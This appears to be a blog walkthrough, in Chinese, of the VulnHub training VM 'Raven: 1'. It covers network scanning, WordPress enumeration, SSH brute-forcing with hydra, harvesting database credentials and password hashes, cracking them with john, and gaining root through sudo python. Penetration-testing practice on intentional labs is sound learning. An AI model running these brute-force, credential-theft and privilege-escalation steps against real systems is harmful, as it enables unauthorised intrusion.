VM - Raven: 1 的破解
本文主要記錄對 Raven: 1 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結:Raven: 1
VM - Raven: 1 的破解
2019年4月14日10:58:06【原創】
1. 官方描述
Name: Raven: 1
名字:Raven: 1
Date release: 14 Aug 2018
釋出日期:2018-8-14
Description: Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.
描述:適合初學者,存在四個 flag,有兩種方式可以獲得 root 許可權。設定虛擬機器為 NAT 網路模式
2. Workthrough
首先使用 netdiscover 發現IP
root@kali:~# netdiscover -r 10.10.10.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.10.10.1 00:50:56:c0:00:08 1 60 VMware, Inc.
10.10.10.2 00:50:56:fb:16:b2 1 60 VMware, Inc.
10.10.10.79 00:0c:29:dc:29:fc 1 60 VMware, Inc.
10.10.10.254 00:50:56:e0:63:df 1 60 VMware, Inc.
獲知IP為 10.10.10.79 ,下面探測埠
root@kali:~# nmap -Pn -p- 10.10.10.79
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 07:03 EDT
Nmap scan report for 10.10.10.79
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
52632/tcp open unknown
MAC Address: 00:0C:29:DC:29:FC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
看到有 80 埠,使用瀏覽器訪問,發現頁面做的非常用心,嘗試在頁面原始碼中發現flag
終於在service 中發現了一個flag
flag1{b9bbcb33e11b80be759c4e844862482d}
使用 dirb 進行目錄爆破
root@kali:~# dirb http://10.10.10.79
START_TIME: Sun Apr 14 07:07:14 2019
URL_BASE: http://10.10.10.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.79/ ----
==> DIRECTORY: http://10.10.10.79/css/
==> DIRECTORY: http://10.10.10.79/fonts/
==> DIRECTORY: http://10.10.10.79/img/
+ http://10.10.10.79/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://10.10.10.79/js/
==> DIRECTORY: http://10.10.10.79/manual/
+ http://10.10.10.79/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.79/vendor/
==> DIRECTORY: http://10.10.10.79/wordpress/
發現存在 CMS wordpress,下面使用 wpscan 進行掃描
root@kali:~# wpscan --url http://10.10.10.79/wordpress --wp-content-dir -ep -et -eu
[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+---------+---------------+
| ID | Login | Name |
+----+---------+---------------+
| 1 | michael | michae |
| 2 | steven | Steven Seagul |
+----+---------+---------------+
[+] Finished: Sat Apr 13 23:31:31 2019
[+] Elapsed time: 00:00:09
[+] Requests made: 1065
[+] Memory used: 25.695 MB
通過列舉發現存在密碼,暴力猜解賬號密碼
root@kali:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.79
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-14 00:03:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:0), ~14344399 tries per task
[DATA] attacking ssh://10.10.10.79:22/
[22][ssh] host: 10.10.10.79 login: michael password: michael
[STATUS] 14344655.00 tries/min, 14344655 tries in 00:00h, 0 to do in 01:00h, 14344148 active
探測出密碼 並嘗試登入
[22][ssh] host: 10.10.10.79 login: michael password: michael
root@kali:~# ssh michael@10.10.10.79
michael@10.10.10.79's password:
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ cd /var/www/
michael@Raven:/var/www$ ls
flag2.txt html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
michael@Raven:/var/www$
此處獲得 flag2的值
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
核心版本還挺高,核心提權估計是不行了
由於此處是一個 cms ,所以去尋找資料庫的賬號密碼,通常在config目錄中
michael@Raven:/var/www/html/wordpress$ vi wp-config.php
// ** MySQL settings - You can get this info from your web host ** //^M
/** The name of the database for WordPress */^M
define('DB_NAME', 'wordpress');^M
^M
/** MySQL database username */^M
define('DB_USER', 'root');^M
^M
/** MySQL database password */^M
define('DB_PASSWORD', 'R@v3nSecurity');^M
^M
/** MySQL hostname */^M
define('DB_HOST', 'localhost');^M
^M
/** Database Charset to use in creating database tables. */^M
define('DB_CHARSET', 'utf8mb4');^M
^M
/** The Database Collate type. Don't change this if in doubt. */^M
define('DB_COLLATE', '');^M
資料庫使用者名稱:root
密碼為:R@v3nSecurity
拿到密碼之後登入資料庫
michael@Raven:/var/www/html/wordpress$ mysql -u root -p
mysql> show databses;
mysql> use wordpress;
mysql> show tables;
遍歷資料庫中的內容,檢視有效資訊,發現 flag3 和 flag4 都隱藏在 wp_posts 中
mysql> select * from wp_posts;
mysql> select * from wp_posts;
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| ID | post_author | post_date | post_date_gmt | post_content | post_title | post_excerpt | post_status | comment_status | ping_status | post_password | post_name | to_ping | pinged | post_modified | post_modified_gmt | post_content_filtered | post_parent | guid | menu_order | post_type | post_mime_type | comment_count |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| 1 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | Welcome to WordPress. This is your first post. Edit or delete it, then start writing! | Hello world! | | publish | open | open | | hello-world | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?p=1 | 0 | post | | 1 |
| 2 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:
<blockquote>Hi there! I'm a miner by day, aspiring actor by night, and this is my website. I live in Kalgoorlie, have a great dog named Red, and I like yabbies. (And gettin' a tan.)</blockquote>
...or something like this:
<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>
As a new WordPress user, you should go to <a href="http://192.168.206.131/wordpress/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun! | Sample Page | | publish | closed | open | | sample-page | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?page_id=2 | 0 | page | | 0 |
| 4 | 1 | 2018-08-13 01:48:31 | 0000-00-00 00:00:00 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | draft | open | open | | | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 0 | http://raven.local/wordpress/?p=4 | 0 | post | | 0 |
| 5 | 1 | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | flag4{715dea6c055b9fe3337544932f2941ce} | flag4 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | | 4 | http://raven.local/wordpress/index.php/2018/08/12/4-revision-v1/ | 0 | revision | | 0 |
| 7 | 2 | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 4 | http://raven.local/wordpress/index.php/2018/08/13/4-revision-v1/ | 0 | revision | | 0 |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
5 rows in set (0.00 sec)
至此 四個 flag 已經全部拿到。但是我們還沒有拿到 root 許可權
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
獲取hash值之後需要暴力破解,由於已經知道一個賬號密碼了,下面破解 steven
root@kali:~# cat hashs.txt
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
root@kali:~# john hashs.txt
pink84 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# john -show hashs.txt
?:pink84
得到密碼為 pink84,使用者名稱 steven,登入
root@kali:~# ssh steven@10.10.10.79
steven@10.10.10.79's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 14:33:53 2019 from 10.10.10.69
$
查詢使用者建立的相關檔案無果
find / -user steven -type f 2>& 1 | grep -v "Permission" | grep -v "No such" | grep -v "proc"
查詢 sudo 許可權
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
發現 python 可以無密碼獲取最高許可權,執行命令
$ sudo python -c 'import pty; pty.spawn("/bin/bash")'
root@Raven:/home/steven#
root@Raven:/home/steven# id
uid=0(root) gid=0(root) groups=0(root)
通常在 /rooot 目錄中都會有一個 flag,去看看吧
root@Raven:/home/steven# cd /root/
root@Raven:~# ls
flag4.txt
root@Raven:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
果然,有一個 falg4
flag4{715dea6c055b9fe3337544932f2941ce}
相關文章
- VM - DerpNStink 的破解
- VM - Lazysysadmin 的破解
- 面向 CTF 的 VM 破解系列
- VM - Typhoon 1.02 的破解
- VM - FourAndSix 2.01 的破解
- VM - 64Base_3mrgnc3 的破解
- VM - CH4INRULZ_v1.0.1 的破解
- Raven-1-WordPress-python命令提權Python
- VM - 6Days_Lab-v1.0.1 的破解
- VM - JIS-CTF-VulnUpload-CTF01 的破解
- Raven-2-WordPress-UDF提權
- 1.安裝 kali到vm並升級
- 我的破解心得(1) (3千字)
- 我的破解心得(12) (1千字)
- 自學linux——1.VMware的安裝及VM下centos的安裝LinuxCentOS
- 破解winimage (1千字)
- WinRar 2.71 for windows的破解(暴力) (1千字)Windows
- 貼個程式的smc破解。 (1千字)
- 把ASM下的HDD VM轉換成ARM下Managed Disk的SSD VMASM
- 破解“Mail Scan” (1千字)AI
- 破解鬥地主1。0 (932字)
- Azure VM的加速網路
- IDEA的使用(1):IDEA的安裝和破解Idea
- Vm 增加硬碟硬碟
- SWF Browser v2.93的破解 (1千字)
- ACDSEE4.0的破解手記 (1千字)
- 我終於破解了魔裝網神了,破解過程!!,不過是用2.70破解的。 (1千字)
- [VM trunk ports]opensatck VM 單網路卡,多VLAN配置
- 在ARM模式下捕獲VM並建立新VM模式
- duelist crackme 1 破解 (5千字)
- wintools5.0破解 (1千字)
- 鬥地主v2.4密碼的最簡單破解――OllyDbg破解法 (1千字)密碼
- 測試1:Access Point(Wifi)的密碼暴力破解WiFi密碼
- node核心模組-vm
- Oracle VM釋出Oracle
- SYSTEM CLEANER 暴力破解 (1千字)
- disk-check如何破解? (1千字)
- OpenExpert1.03破解 (1千字)